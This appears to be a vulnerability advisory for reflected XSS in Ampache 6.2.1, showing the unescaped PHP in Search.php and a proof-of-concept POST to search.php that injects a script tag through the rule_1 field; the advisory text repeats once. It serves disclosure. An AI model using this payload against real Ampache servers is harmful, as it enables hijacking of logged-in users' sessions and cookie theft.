Summary
Ampache 6.2.1 has multiple reflective XSS vulnerabilities,this means that all forms in the Ampache that use rule
as a variable are not secure.
For example, when querying a song, when querying a podcast, we need to use $rule
variable.
Details
|
public function to_js(): string |
|
{ |
|
$javascript = ""; |
|
foreach ($this->rules as $rule) { |
|
$javascript .= '<script>' . 'SearchRow.add("' . $rule[0] . '","' . $rule[1] . '","' . $rule[2] . '", "' . $rule[3] . '"); </script>'; |
|
} |
|
|
|
return $javascript; |
|
} |
The reason is that the $rule
($rule[0], $rule[1], $rule[2], $rule[3]) variables are directly referenced by $javascript into the front-end code without filtering malicious strings.
PoC
POST /search.php?type=song HTTP/1.1
Host: ip:port
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: ampache=cuc4m0elqlokqdum34ru7m4spf; ampache_user=admin2; ampache_lang=zh_CN; ampache_remember=admin2%3A24a826cec0ddf0bbd727dd8952db70dc%3A6b7985702a9d39573700e27c9f85ab232c497e86103a0e066d2de2ec7f2ac473
Connection: close
Content-Length: 712
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="action"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="browse_id"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="limit"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="operator"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="random"
on
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="rule_1"
1</script><script>alert(1)</script><script>
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="rule_1_input"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="rule_1_operator"
1
------------YWJkMTQzNDcw--
Impact
In the form provided by search.php, many parameters can cause the html page to be tampered with. If the attacker can create a form from his own web page, then the user or administrator who has logged in will be forced to submit a malicious form through the program of the page constructed by the attacker, resulting in Cookie theft.
Summary
Ampache 6.2.1 has multiple reflective XSS vulnerabilities,this means that all forms in the Ampache that use
rule
as a variable are not secure.For example, when querying a song, when querying a podcast, we need to use
$rule
variable.Details
ampache/src/Repository/Model/Search.php
Lines 1732 to 1740 in bcaa9a4
The reason is that the
$rule
($rule[0], $rule[1], $rule[2], $rule[3]) variables are directly referenced by $javascript into the front-end code without filtering malicious strings.PoC
Impact
In the form provided by search.php, many parameters can cause the html page to be tampered with. If the attacker can create a form from his own web page, then the user or administrator who has logged in will be forced to submit a malicious form through the program of the page constructed by the attacker, resulting in Cookie theft.